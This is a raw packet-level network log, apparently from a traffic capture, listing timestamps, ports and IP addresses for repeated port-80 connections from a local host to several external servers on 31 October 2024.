Oct 31, 2024 10:26:01.112154007 CET	49969	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:01.118326902 CET	80	49969	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:01.118415117 CET	49969	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:01.129481077 CET	49969	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:01.135149956 CET	80	49969	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:02.075104952 CET	80	49969	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:02.124820948 CET	49969	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:02.458815098 CET	80	49969	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:02.458901882 CET	49969	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:02.640508890 CET	49969	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:03.659269094 CET	49983	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:03.664731979 CET	80	49983	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:03.664815903 CET	49983	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:03.675971985 CET	49983	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:03.680835962 CET	80	49983	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:03.680860996 CET	80	49983	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:04.649116039 CET	80	49983	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:04.702893019 CET	49983	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:05.187360048 CET	49983	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:06.207449913 CET	49990	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:06.212944031 CET	80	49990	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:06.213114977 CET	49990	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:06.224742889 CET	49990	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:06.229716063 CET	80	49990	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:07.175349951 CET	80	49990	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:07.234184980 CET	49990	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:07.650532961 CET	80	49990	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:07.650693893 CET	49990	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:07.650892973 CET	80	49990	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:07.650950909 CET	49990	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:07.662951946 CET	49990	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:07.667887926 CET	80	49990	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:12.697345018 CET	49991	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:12.702244043 CET	80	49991	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:12.702331066 CET	49991	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:12.719130039 CET	49991	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:12.724886894 CET	80	49991	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:14.284162045 CET	49991	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:14.293129921 CET	80	49991	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:14.293226004 CET	49991	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:15.300189018 CET	49992	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:15.305385113 CET	80	49992	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:15.305473089 CET	49992	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:15.315876007 CET	49992	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:15.320766926 CET	80	49992	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:16.850214005 CET	49992	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:16.855789900 CET	80	49992	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:16.855881929 CET	49992	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:17.862296104 CET	49993	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:17.867383957 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:17.867566109 CET	49993	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:17.882667065 CET	49993	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:17.887593031 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:17.887691021 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:19.271138906 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:19.271198988 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:19.271239042 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:19.271392107 CET	49993	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:19.271451950 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:19.271490097 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:19.271552086 CET	49993	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:19.309783936 CET	80	49993	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:19.309885025 CET	49993	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:19.390582085 CET	49993	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:20.446435928 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:20.646423101 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:20.646696091 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:20.766700983 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:20.772054911 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.620354891 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.620404959 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.620440960 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.620474100 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:21.620959997 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.620995045 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.621012926 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:21.621047974 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.621149063 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:21.621824980 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.621871948 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.621906996 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.621917963 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:21.658425093 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:21.658649921 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:21.659970999 CET	49994	80	192.168.2.5	162.0.215.244
Oct 31, 2024 10:26:21.664813042 CET	80	49994	162.0.215.244	192.168.2.5
Oct 31, 2024 10:26:26.693417072 CET	49995	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:26.698434114 CET	80	49995	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:26.698534012 CET	49995	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:26.710766077 CET	49995	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:26.715725899 CET	80	49995	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:27.395555019 CET	80	49995	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:27.433886051 CET	80	49995	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:27.435679913 CET	49995	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:28.219456911 CET	49995	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:29.243773937 CET	49996	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:29.248884916 CET	80	49996	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:29.251880884 CET	49996	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:29.263995886 CET	49996	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:29.268904924 CET	80	49996	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:29.939997911 CET	80	49996	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:29.977680922 CET	80	49996	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:29.977736950 CET	49996	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:30.765443087 CET	49996	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:31.785840034 CET	49997	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:31.790911913 CET	80	49997	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:31.791001081 CET	49997	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:31.804656982 CET	49997	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:31.809632063 CET	80	49997	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:31.809657097 CET	80	49997	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:32.466545105 CET	80	49997	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:32.504741907 CET	80	49997	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:32.504852057 CET	49997	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:33.315584898 CET	49997	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:34.331302881 CET	49998	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:34.336373091 CET	80	49998	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:34.336471081 CET	49998	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:34.344094038 CET	49998	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:34.349003077 CET	80	49998	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:35.020091057 CET	80	49998	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:35.058484077 CET	80	49998	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:35.061656952 CET	49998	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:35.062525034 CET	49998	80	192.168.2.5	162.0.231.203
Oct 31, 2024 10:26:35.067435980 CET	80	49998	162.0.231.203	192.168.2.5
Oct 31, 2024 10:26:40.099596024 CET	49999	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:40.104530096 CET	80	49999	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:40.104607105 CET	49999	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:40.120219946 CET	49999	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:40.125180006 CET	80	49999	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:41.066744089 CET	80	49999	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:41.109577894 CET	49999	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:41.246289968 CET	80	49999	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:41.246370077 CET	49999	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:41.624818087 CET	49999	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:42.643547058 CET	50000	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:42.648662090 CET	80	50000	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:42.648756981 CET	50000	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:42.658293009 CET	50000	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:42.663266897 CET	80	50000	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:43.598071098 CET	80	50000	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:43.657571077 CET	50000	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:43.775631905 CET	80	50000	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:43.775758982 CET	50000	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:44.171713114 CET	50000	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:45.190650940 CET	50001	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:45.195557117 CET	80	50001	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:45.196197033 CET	50001	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:45.207139015 CET	50001	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:45.212059021 CET	80	50001	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:45.212136030 CET	80	50001	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:46.148559093 CET	80	50001	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:46.202867031 CET	50001	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:46.324362040 CET	80	50001	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:46.324430943 CET	50001	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:46.718568087 CET	50001	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:47.739564896 CET	50002	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:47.744544983 CET	80	50002	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:47.744683981 CET	50002	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:47.751538038 CET	50002	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:47.757415056 CET	80	50002	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:48.690690994 CET	80	50002	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:48.866681099 CET	80	50002	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:48.869008064 CET	50002	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:48.871741056 CET	50002	80	192.168.2.5	103.71.154.12
Oct 31, 2024 10:26:48.876646042 CET	80	50002	103.71.154.12	192.168.2.5
Oct 31, 2024 10:26:53.920296907 CET	50003	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:53.925244093 CET	80	50003	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:53.925317049 CET	50003	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:53.937131882 CET	50003	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:53.942001104 CET	80	50003	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:54.560713053 CET	80	50003	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:54.560825109 CET	50003	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:55.453573942 CET	50003	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:55.458635092 CET	80	50003	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:56.472743034 CET	50004	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:56.477922916 CET	80	50004	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:56.478012085 CET	50004	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:56.489922047 CET	50004	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:56.494956970 CET	80	50004	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:57.104809046 CET	80	50004	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:57.104934931 CET	50004	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:57.999802113 CET	50004	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:58.005280972 CET	80	50004	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:59.020574093 CET	50005	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:59.025789022 CET	80	50005	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:59.025886059 CET	50005	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:59.036293983 CET	50005	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:26:59.041547060 CET	80	50005	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:59.041573048 CET	80	50005	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:59.655565023 CET	80	50005	3.33.130.190	192.168.2.5
Oct 31, 2024 10:26:59.656183958 CET	50005	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:00.547697067 CET	50005	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:00.552798986 CET	80	50005	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:01.573587894 CET	50006	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:01.786514044 CET	80	50006	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:01.792589903 CET	50006	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:01.837593079 CET	50006	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:01.842484951 CET	80	50006	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:05.381896019 CET	80	50006	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:05.382555008 CET	80	50006	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:05.382910013 CET	50006	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:05.387625933 CET	50006	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:05.392476082 CET	80	50006	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:10.408960104 CET	50007	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:10.413906097 CET	80	50007	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:10.413980007 CET	50007	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:10.425013065 CET	50007	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:10.429974079 CET	80	50007	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:11.937433004 CET	50007	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:11.942666054 CET	80	50007	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:11.942739010 CET	50007	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:12.956243992 CET	50008	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:12.961251020 CET	80	50008	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:12.967686892 CET	50008	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:12.975718021 CET	50008	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:12.980972052 CET	80	50008	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:13.585740089 CET	80	50008	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:13.589673996 CET	50008	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:14.484175920 CET	50008	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:14.518122911 CET	80	50008	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:15.505573988 CET	50009	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:15.510941029 CET	80	50009	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:15.513669968 CET	50009	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:15.525587082 CET	50009	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:15.530688047 CET	80	50009	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:15.530694962 CET	80	50009	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:17.033582926 CET	50009	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:17.039258003 CET	80	50009	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:17.045572042 CET	50009	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:18.055295944 CET	50010	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:18.060364008 CET	80	50010	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:18.060446978 CET	50010	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:18.068876028 CET	50010	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:18.073853970 CET	80	50010	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:25.910413027 CET	80	50010	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:25.911101103 CET	80	50010	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:25.911153078 CET	50010	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:25.913516998 CET	50010	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:27:25.918374062 CET	80	50010	3.33.130.190	192.168.2.5
Oct 31, 2024 10:27:31.041259050 CET	50011	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:31.046145916 CET	80	50011	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:31.046464920 CET	50011	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:31.061582088 CET	50011	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:31.066492081 CET	80	50011	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:31.711374044 CET	80	50011	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:31.711417913 CET	80	50011	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:31.711507082 CET	50011	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:31.743503094 CET	80	50011	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:31.743633032 CET	50011	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:32.562387943 CET	50011	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:33.597717047 CET	50012	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:33.602833986 CET	80	50012	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:33.603785992 CET	50012	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:33.628266096 CET	50012	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:33.633352041 CET	80	50012	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:34.219610929 CET	80	50012	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:34.219667912 CET	80	50012	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:34.219719887 CET	50012	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:34.220179081 CET	80	50012	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:34.220228910 CET	50012	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:35.141594887 CET	50012	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:36.165229082 CET	50013	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:36.170305967 CET	80	50013	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:36.170403004 CET	50013	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:36.195671082 CET	50013	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:36.200658083 CET	80	50013	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:36.200998068 CET	80	50013	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:36.803607941 CET	80	50013	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:36.804124117 CET	80	50013	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:36.804136992 CET	80	50013	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:36.804169893 CET	50013	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:36.804205894 CET	50013	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:37.702912092 CET	50013	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:38.722757101 CET	50014	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:38.727782965 CET	80	50014	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:38.727869987 CET	50014	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:38.739355087 CET	50014	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:38.744640112 CET	80	50014	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:39.344731092 CET	80	50014	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:39.344789028 CET	80	50014	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:39.344949007 CET	50014	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:39.345809937 CET	80	50014	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:39.347774982 CET	50014	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:39.368585110 CET	50014	80	192.168.2.5	199.59.243.227
Oct 31, 2024 10:27:39.720731020 CET	80	50014	199.59.243.227	192.168.2.5
Oct 31, 2024 10:27:44.432437897 CET	50015	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:44.437390089 CET	80	50015	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:44.437469959 CET	50015	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:44.450997114 CET	50015	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:44.455930948 CET	80	50015	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:45.145678997 CET	80	50015	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:45.153650045 CET	50015	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:45.952879906 CET	50015	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:45.957869053 CET	80	50015	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:46.972013950 CET	50016	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:46.977042913 CET	80	50016	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:46.977650881 CET	50016	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:46.989578962 CET	50016	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:46.994575024 CET	80	50016	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:47.693555117 CET	80	50016	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:47.693731070 CET	50016	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:48.499989033 CET	50016	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:48.505177021 CET	80	50016	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:49.518549919 CET	50017	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:49.524483919 CET	80	50017	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:49.524606943 CET	50017	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:49.537592888 CET	50017	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:49.543373108 CET	80	50017	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:49.543380976 CET	80	50017	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:50.182651043 CET	80	50017	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:50.182732105 CET	50017	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:51.046860933 CET	50017	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:51.052171946 CET	80	50017	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:52.066795111 CET	50018	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:52.071948051 CET	80	50018	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:52.072029114 CET	50018	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:52.081629992 CET	50018	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:52.086595058 CET	80	50018	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:52.737041950 CET	80	50018	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:52.769349098 CET	80	50018	13.248.169.48	192.168.2.5
Oct 31, 2024 10:27:52.769488096 CET	50018	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:52.770576000 CET	50018	80	192.168.2.5	13.248.169.48
Oct 31, 2024 10:27:52.775423050 CET	80	50018	13.248.169.48	192.168.2.5
Oct 31, 2024 10:28:01.926812887 CET	50019	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:01.931819916 CET	80	50019	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:01.931941986 CET	50019	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:01.943365097 CET	50019	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:01.948214054 CET	80	50019	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:02.645801067 CET	80	50019	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:02.645853996 CET	80	50019	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:02.645895958 CET	50019	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:02.697880030 CET	80	50019	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:02.697940111 CET	50019	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:03.455600023 CET	50019	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:04.473042011 CET	50020	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:04.478108883 CET	80	50020	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:04.478199959 CET	50020	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:04.492122889 CET	50020	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:04.497179031 CET	80	50020	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:05.192243099 CET	80	50020	38.88.82.56	192.168.2.5
